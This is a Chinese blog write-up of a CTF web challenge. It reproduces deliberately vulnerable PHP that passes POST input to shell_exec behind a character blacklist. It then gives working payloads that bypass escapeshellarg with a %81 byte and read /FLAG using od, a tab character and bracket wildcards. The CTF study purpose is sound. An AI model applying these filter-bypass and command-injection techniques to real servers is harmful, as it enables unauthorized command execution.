[广东强网杯 2021 团队组]love_Pokemon 复现详解

最新推荐文章于 2024-06-07 19:04:22 发布
最新推荐文章于 2024-06-07 19:04:22 发布
阅读量168 收藏 1
点赞数 1
分类专栏: CTF Web安全 RCE 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63138919/article/details/133197606
版权
CTF 同时被 3 个专栏收录
24 篇文章 0 订阅
订阅专栏
Web安全
13 篇文章 0 订阅
订阅专栏
RCE
2 篇文章 0 订阅
订阅专栏

[广东强网杯 2021 团队组]love_Pokemon

源码:

<?php

error_reporting(0);

highlight_file(__FILE__);

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';

if(!file_exists($dir)){

    mkdir($dir);

}

function DefenderBonus($Pokemon){

    if(preg_match("/'| |_|\\$|;|l|s|flag|a|t|m|r|e|j|k|n|w|i|\\\\|p|h|u|v|\\+|\\^|\`|\~|\||\"|\<|\>|\=|{|}|\!|\&|\*|\?|\(|\)/i",$Pokemon)){

        die('catch broken Pokemon! mew-_-two');

    }

    else{

        return $Pokemon;

    }

}

function ghostpokemon($Pokemon){

    if(is_array($Pokemon)){

        foreach ($Pokemon as $key => $pks) {

            $Pokemon[$key] = DefenderBonus($pks);

        }

    }

    else{

        $Pokemon = DefenderBonus($Pokemon);

    }

}

switch($_POST['myfavorite'] ?? ""){

    case 'picacu!':

        echo md5('picacu!').md5($_SERVER['REMOTE_ADDR']);

        break;

    case 'bulbasaur!':

        echo md5('miaowa!').md5($_SERVER['REMOTE_ADDR']);

        $level = $_POST["levelup"] ?? "";

    if ((!preg_match('/lv100/i',$level)) && (preg_match('/lv100/i',escapeshellarg($level)))){

            echo file_get_contents('./hint.php');

        }

        break;

    case 'squirtle':

        echo md5('jienijieni!').md5($_SERVER['REMOTE_ADDR']);

        break;

    case 'mewtwo':

        $dream = $_POST["dream"] ?? "";

        if(strlen($dream)>=20){

            die("So Big Pokenmon!");

        }

        ghostpokemon($dream);

        echo shell_exec($dream);

}

?>

  1. 1.获得hint.php

获得hint.php的条件就是先满足switch这个循环 当满足case为 bulbasaur! 的时候它才会去执行下面这个匹配函数

那么这个就是说输入的字符串不包含lv100,但是经过escapeshellarg()处理之后含有lv100

这里就是一个escapeshellarg() 的考点

escapeshellarg 的作用是把字符串转码为可以在 shell 命令里使用的参数。(escapeshellarg 和 escapeshellcmd 相似,主要看是否有引号)

那么这里就可以使用漏洞:escapeshellarg()这个函数在处理超过ASCII码范围的字符的时候会直接过滤掉该字符串

那么我们直接我们可以用%81去绕过,因为%81为不可见字符(当然还有其他的)

那最终这里的paylaod:myfavorite=bulbasaur!&levelup=lv%81100

 

得到重要的提示是flag文件的路径为 /FLAG

2.去获得flag

想获得flag那我们就要去找输出口 显然shell_exec()就是我们需要的函数

 

那么这里有个条件就是 post传入的dream的长度不能超过20字节

那我们直接传入dream=cat /FLAG 肯定是不行的,因为上边存在过滤

把flag(大小写)和空格一些字符都过滤了那么这里的重点就是如何绕过

(1)绕过空格好说

(2)如何使用读取命令

使用od命令

od 是一个在Unix和Linux系统上可用的命令行工具,用于以不同的格式显示文件的内容。它的名称代表"octal dump"(八进制转储),因为它最初的目的是以八进制形式显示文件的内容

(3)如何绕过FLAG

这里用到了[]通配的形式,由于黑名单中有A何L这两个字符,因此构造F[B-Z][@-Z]G,这样就能匹配上ASCII表中的@到Z之间的所有字符

所以最终的payload:myfavorite=mewtwo&dream=od%09/F[B-Z][@-Z]G

长度也小于20

得到一个8进制数字  把他转为字符串就可以得到flag了

这里附加一个8进制转字符串的py脚本

d

ump = "0000000 051516 041523 043124 034173 061062 063061 060544 026546 0000020 032464 034146 032055 033541 026462 062141 034461 034455 0000040 031060 034541 060470 032065 061067 076541 000012 0000055"

octs = [("0o" + n) for n in  dump.split(" ") if n]

hexs = [int(n, 8) for n in octs]

result = ""

for n in hexs:

    if (len(hex(n)) > 4):

        swapped = hex(((n << 8) | (n >> 8)) & 0xFFFF)

        result += swapped[2:].zfill(4)

print(bytes.fromhex(result).decode())

总结:

  1. 如何绕过escapeshellarg()函数
2.命令执行绕过WAF来执行RCE
W3nd4L0v3
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
xposed框架在分机安装失败_pokemon go 和 虚拟gps
weixin_39527078的博客
12-20 554
尝试fake gps类软件在非root,没有xposed框架的纯净情况下,fake gps 会有不能定位或者没有gps signal的现实,从而不会加载游戏数据不过使用最开始的fake gps,在打开网络定位的情况下,虽然游戏正常,但是gps并不会是软件模拟出的地址。几个别人提到的app:fake gps(我开始用的,最稳定的mock gps,不过没有摇杆)https://play.google....
​Problem: [广东强网杯 2021 个人决赛]pic+​会用binwalk和blindwatermark工具的使用
2301_79316009的博客
03-31 279
会用binwalk和blindwatermark工具。
NSSCTF第12页(2)
wwwwyyyrre的博客
11-15 638
<user></intro></user>
【刷题日志3.4--3.10】
qq_74240553的博客
03-06 885
ctf
NSSCTF之Misc篇刷题记录⑧
Aluxian_的博客
05-05 1393
【代码】NSSCTF之Misc篇刷题记录⑧。
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
2021年10月广东强网杯,REVERSE的simplere
沐一 · 林 的博客
10-14 549
2021年10月广东强网杯,REVERSE的simplere 下载附件,照例扔入exeinfope中查看信息: . . 64位ELF文件,无壳,照例先运行一下程序,查看主要回显信息: . . 照例扔入IDA中查看伪代码信息,有main函数看main函数: . . (这里积累第一个经验) 上图分析了前半部分,现在跟踪那个关键自定义函数v10 = sub_401192(v5);这是对前15个字符进行操作,手扒得到ssddddwddddssas . . 然后上半部分条件就过了,开始分析后半部分: . .
安卓游戏广告加速插件_Pokemon Go游戏加速器 安卓/IOS客户端 使用方法
weixin_39722196的博客
10-23 3231
登陆下方网址,注册即可获得两小时免费使用时间,如果需要购买直接在网站上充值购买即可www.pogojsq.club(链接复制链接到浏览器中打开即可)网页中都有详细教程,根据手机系统选择相应教程即可。国内玩家登陆一定要开启加速器!登陆时注意自己是老用户还是新用户,凡是新号(没有登陆过的)需要点击新用户登陆。一、任天堂账号登陆:1.国内用户,请先打开VPN并连接,VPN可以到网上或者App ...
Digital Overdose 2021 Autumn CTF 部分题目赛后复现
Nancy523的博客
10-11 948
。。。属实蚌埠住了 国内科技公司支持,中东人主办的日本比赛。。osint真的有点 一言难尽跟土澳的比赛对比起来差太多了 官网比赛地址 OSINT: Tour de Japan 看标题 描述应该是围绕这立本来的,,但是结果几乎90%是在Tokyo可还行 1 - Dare enter the mirror world 题目描述: 平平无奇,问了图片拍摄地址 直接yandex识图: 点进第一个链接 往下翻: 题目要求flag2 words DO{Tokyu_Plaza} 2 - The land of
app.zip_Pokemon_main_smali _zip
09-23
smali main activities of pokemon
scrcmd_Pokemon_
10-04
scrcmd for pokemon platinum
Pokemon (1)_Pokemon_
09-30
good font for pokemon related
e6_game_python_Pokemon_
09-30
Pokemon的基本功能实现,设计了Pokemon的类,玩家账号,以及物品栏,以及物品使用!
SOURCE_Pokemon_
10-02
Pokemon Gold source code
基于拓扑漏洞分析的网络安全态势感知模型
最新发布
attack2001的专栏
06-07 601
漏洞态势分析是指通过获取网络系统中的漏洞信息、拓扑信息、攻击信息等,分析网络资产可能遭受的安全威胁以及预测攻击者利用漏洞可能发动的攻击,构建拓扑漏洞图,展示网络中可能存在的薄弱环节,以此来评估网络安全状态。在网络安全形势日益恶化的今天,如何快速有效地获取网络系统的安全状况、提高网络安全应对水平、增大网络安全的预警时间,成为网络空间安全领域研究的重要问题。网络漏洞态势感知研究存在的问题是缺乏有效的网络漏洞势数据采集和要素提取方法,使得网络资产漏洞态势的理解和分析计算难以进行。
网络安全实战基础——实战工具与攻防环境介绍
Dijkstra's Monk-ey的博客
06-05 975
实战集成工具虚拟机VMware Workstation:大家熟知的虚拟机Virtual Box:开源免费、轻量级Kali Linux工具集信息收集BlackArch LinuxMetasploit集成在Kali Linux系统中基本模块如下:渗透模块 辅助模块 攻击载荷模块 Shellcode模块其他渗透工具集成系统 1. 报错型注入(Union Select),包括字符串型和数字型报错型注入(基于二次注入)盲注,包括普通判定注入和基于时间的注入。更新查询注入。插入查询注入。HTTP头部注入
网络安全第一课
Ying_hao_kun的博客
06-04 525
两台服务器访问必须知道对方的ip,但是ip太难记了,所以有了域名代替IP ,dns的作用就是解析域名变成ip,有了这个之后,访问其他有域名的网站,就不需要再去记ip了,但是我们一定要记住dns服务器的ip,百度服务器的ip假如是200.1.1.3,那么就必须经过网关才可以访问,也就是访问外网必须经过网关处理,这里其中的原理就暂时先不分享了,网关的本机名一般都是第一个或者最后一个。子网掩码(跟IP地址是情侣,不能单身,有ip必须有子网掩码),在同一局域网中,所有的ip必须在同一网段中才能够进行通信。
网络安全中攻击溯源方法
2301_76786857的博客
05-29 1135
攻击溯源可以帮助用户对攻击放进行锁定放入数据库,可以帮助其他用户进行态势感知,同时可以协调相关织打击违法犯罪行为,避免下一次的攻击。2、分析攻击特征:通过分析攻击事件的特征,如攻击方式、攻击时间、攻击目标等,来确定攻击类型和攻击者的特点。4、分析攻击工具:通过分析攻击者使用的工具、恶意代码等,确定攻击者的攻击技术和水平,进而锁定攻击者身份。5、建立攻击链路:通过对攻击事件的各个环节进行分析,建立攻击链路,找到攻击者入侵的路径和方法。1、收集证据:收集攻击事件的各种证据,包括日志、网络数据包、磁盘镜像等。
gpt my_pokemon.py是python的可执行脚本 命令“my_pokemon.py 11243 <<< $'1\n1\n1\n1\n1\n1\n1'”是什么意思
04-12
这是一个用命令行运行 Python 脚本的指令,其中 my_pokemon.py 是你要执行的 Python 脚本文件名,11243 是传入该脚本的一个参数。"<<< $'1\n1\n1\n1\n1\n1\n1'" 则是将字符串 "1\n1\n1\n1\n1\n1\n1" 传入脚本的标准输入中。具体脚本的功能需要看代码实现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W3nd4L0v3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值